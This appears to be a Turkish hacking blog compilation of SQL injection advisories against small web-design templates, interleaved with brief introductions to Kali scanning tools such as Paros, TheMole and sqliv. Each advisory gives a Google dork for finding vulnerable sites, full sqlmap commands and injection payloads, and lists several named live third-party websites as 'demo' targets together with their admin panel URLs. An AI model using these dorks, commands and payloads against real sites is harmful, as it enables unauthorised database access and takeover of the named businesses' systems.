Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability



#################################################################################
# Exploit Title: Designed by ORGINSTUDIOS.COM Sql İnjection Vulnerability
# Author : TrazeR  & AKINCİLAR
# Google Dork : intext:"Designed by ORGINSTUDIOS.COM" inurl:catid
# Tested on : Windows 7
# Date : 01.07.2019
# Vendor Home: https://orginstudios.com/
# Blog : https://www.trazer.org/
# Forum : http://www.cyber-warrior.org/
#################################################################################

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

root@TrazeR:~# Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Sqlmap Or Manuel
[+] GET parameter 'catid' is vulnerable

Demo: http://graphicarts.gr/portal/corp.php?catid=260'+and(%2f**%2fsElEcT+1+%2f**%2ffRoM(%2f**%2fsElEcT+count(*),%2f**%2fcOnCaT((%2f**%2fsElEcT(%2f**%2fsElEcT+aes_decrypt(aes_encrypt(%2f**%2fcOnCaT(0x217e21,%2f**%2fdAtAbAsE(),0x217e21),1),1))+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2flImIt+0,1),floor(rand(0)*2))x+%2f**%2ffRoM+information_schema.%2f**%2ftAbLeS+%2f**%2fgRoUp%2f**%2fbY+x)a)+and+'1'='1&cp=8&cntrid=


Demo 2 :  http://www.exaireton.com/mainsite/products.php?catid=37

Parameter: catid (GET)
Type: boolean-based blind
Title: OR boolean-based blind - WHERE or HAVING clause
Payload: catid=-5607) OR 3893=3893-- HOfb

#AKINCILAR ! BU GÜCE SAYGI DUYUN !

[+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+][+]

Kali Linux Paros Website Vulnerability Scanner

Selamun Aleyküm...

Intro  - "Paros" Proxy, web uygulamalarının güvenliğini değerlendirmek isteyen kişiler için yazılmıştır. Paros'un proxy niteliği sayesinde, çerezler ve form alanları da dahil olmak üzere, sunucu ve istemci arasındaki tüm HTTP ve HTTPS verileri engellenebilir ve değiştirilebilir.

Paros , Web Uygulaması Denetleme, test etme ve hata ayıklama için, ücretsiz Java tabanlı bir araçtır. Bu konuda, Paros'un birçok kullanımının sadece birkaçı gösterilecektir. Paros'un proxy özelliği, bir tarayıcıya gelen ve bu tarayıcıdan gelen trafiği denetlemek açısından çok değerlidir. Bu, geliştiricilerin ve denetçilerin, çerezlerin nasıl ayarlandığı, bir tarayıcıya yönlendirilen yönlendirmeler ve tarayıcıdan sunucuya gönderilen sorgular gibi web uygulama mimarilerinin çeşitli yönlerini araştırmalarını sağlar. Paros bazı otomatik tarama araçlarını içeriyor olsa da, bunlar oldukça zayıf ve Paros, neyi arayacağını bilen yetenekli bir penetrasyon test aracidir. (HTTP / HTTPS proxy. On-the-fly HTTP, XSS, SQL Enjeksiyonlari vb..)

Video: 

Begenip abone olmayı unutmayın..

Credits Previcinidesign Sql Injection Vulnerability


KOD:
#################################################################################
# Exploit Title: CREDITS PREVICINIDESIGN Sql İnjection Vulnerability
# Author : TrazeR & Sipahiler & TurkZ.org
# Google Dork : intext:"CREDITS PREVICINIDESIGN" & inurl:id= Or Web by PREVICINIDESIGN & php?id=
# Tested on : Kali Linux 2017 Chrome, Firefox
# Date : 2017-12-01
# Vendor Home: http://www.previcinidesign.com/
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/
# Telegram: https://t.me/turkzgrup
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --level=5 --risk=3 --threads=10 --timeout=10  --random-agent --text-only -u "http://www.onoya.it/it/menu.php?idCat=25" --no-cast --batch --dbs

Parameter: idCat (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: idCat=25 AND 3326=3326

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: idCat=25 AND SLEEP(5)


Demo:
http://www.onoya.it/it/menu.php?idCat=25
http://www.amarcordpiadineria.it/notizie-fresche.php?ID=15
http://www.osteopatiassociati.it/casi-scheda.php?ID=29
http://ibrubinetterie.com/eng/collezione-doccia-lista.php?ID=7

Panel:
http://www.onoya.it/aps
http://www.amarcordpiadineria.it/admin/
http://www.osteopatiassociati.it/admin/
http://ibrubinetterie.com/admin/

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & TrazeR & Zer0day & Kutluhan & Göçebe & BlueTrojen
Special Thanks TurkZ.org All Staff

Kali Linux TheMole Automatic SQL Injection Exploitation Tool

Selamun Aleyküm ...

Kali Linux TheMole otomatik SQL Enjeksiyon sömürme aracı

TheMole, bir komut satırı arabirimi SQL Enjeksiyon sömürme aracıdır.
Bu uygulama union-based, blind, boolean-based dayali Enjeksiyonlardan yararlanabilir.
The Mole, Mysql, Mssql ve Postgresql'i desteklemektedir;
apt-get update
apt-get install themole yazarak kurabilirsiniz.




ArkansasWeb.com Sql İnjection Vulnerability


[CODE]#################################################################################
# Exploit Title: ArkansasWeb.com Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:Web Design and Hosting by ArkansasWeb.com  & inurl:id=
# Vendor Home: https://www.arkansasweb.com/
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Date : 2017-10-11
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################

Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.employment4u.com/jobdescription.php?id=254"

Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=254 AND 4058=4058

    Type: UNION query
    Title: MySQL UNION query (NULL) - 7 columns
    Payload: id=254 UNION ALL SELECT CONCAT(0x717a717171,0x4272554e774d6557774d6a714b694d697a4b43426f78524176614f626c7a4c6d75686359514d4a55,0x7171716b71),NULL,NULL,NULL,NULL,NULL,NULL#


Demo :
http://www.employment4u.com/jobdescription.php?id=254
http://www.ridgewoodtimbercorp.com/property.php?id=331

Greet'Zzz : Darkcod3r & EfendiBey & Atabey & Odesa & TrazeR & Zer0Day & AKA_1NF4z & Kutluhan & Alianz & By_Dadas & S1R & Seytan6161 [/CODE]

Kali Linux Sql İnjection Server Scanner


Selamun Aleyküm ... 

Mazda Gibi Bir Hedef Sİtemız Var Arkadaslar, Cms Joomla
Hedefde Açık Bulunamadıgı Zaman Aynı İp Adresı Üzerındekı Siteler Taranır.
Serversqlscan'da Bu Yuzden Var,Pprogramın Mantıgı Çok Basıt İp adresini Giriyosunuz Buldugu Acıkları Kayit Edecegı Dosya Adını Belırtıyosunuz Beklıyosunuz.. Tool Sizin İçin Bing Arama Motoru Üzerinde İp Adresindeki Siteleri Bulup Sonuna Meta Karakter Olan ' Tek Tırnagı Atiyor Bulursa Gösterip Kayıt Ediyor :) 

Video:


Open Source: https://paste.ubuntu.com/25485392/


Innovins Sql İnjection Vulnerability



[CODE]#################################################################################
# Exploit Title: Innovins Sql İnjection Vulnerability
# Author : Sipahiler & TURKZ.org
# Google Dork : intext:"Developed by Innovins" & inurl:id=
# Tested on : Kali Linux 2017.1 Chrome, Firefox
# Data : 2017-09-05
# Blog : http://www.trazer.org/
# Forum : http://www.turkz.org/Forum/     
#################################################################################
Tutorial :
[+] Dorking İn Google Or Other Search Enggine
[+] Open Target
[+] Sqlmap And Manuel

Command : root@TrazeR:~# sqlmap --random-agent --technique=BEUS  --threads=10 --no-cast  --tamper=space2comment,randomcase --timeout=10 --level=3 --risk=3  --batch  --dbs -u "http://www.charlstondsouza.com/event1.php?id=11"

Parameter: id (GET)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: id=11' RLIKE (SELECT (CASE WHEN (3513=3513) THEN 11 ELSE 0x28 END)) AND 'vQij'='vQij

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=11' AND (SELECT 1488 FROM(SELECT COUNT(*),CONCAT(0x716a6b6271,(SELECT (ELT(1488=1488,1))),0x7171706a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'QJBd'='QJBd

    Type: UNION query
    Title: MySQL UNION query (NULL) - 6 columns
    Payload: id=-2119' UNION ALL SELECT NULL,CONCAT(0x716a6b6271,0x415064474443646e726c5968517a4f4e7561676556576553695a576473454e524d47797365504452,0x7171706a71),NULL,NULL,NULL,NULL#

Demo :
http://www.charlstondsouza.com/event1.php?id=11
http://www.pehl.co.in/page.php?id=17
http://www.sunrich.co.in/article.php?id=2

http://www.charlstondsouza.com/sn-panel/admin-login.php
http://pehl.co.in/admin/login.php
http://www.sunrich.co.in/admin

Note: Look İn The Source Code To Find The Admin Panel
References:
http://www.turkz.org/Forum/konu/innovins-sql-injection-vulnerability.3401/
https://cxsecurity.com/issue/WLB-2017090029

[/CODE]

Kali Linux Massive SQL injection Scanner

 Selamun Aleyküm ...
Sqliv Verilen dork'tan birden fazla web sitesini arar ve sonuçları birer birer tarar:

Kurulum:
git clone https://github.com/Hadesy2k/sqliv.git
cd sqliv
ls
python2 setup.py -i
python sqliv.py
Kullanim : 
Python sqliv.py - d < SQLI  DORK >  - e < ARAMA  MOTORU >   
örnek: python sqliv.py - d "inurl:index.php?id= site:IT" -e google 

Isteğe bağlı bağımsız değişkenler:
-h, --help bu yardım mesajını gösterir ve çıkar
-d inurl:SQL enjeksiyon dork
-e google arama motoru [Google şimdilik]
-p arama motorunda aramak için web sitelerinin sayısı 100
-t www.example.com tarama hedef web sitesini
-r ters etki alanı (reverse ip)

Video: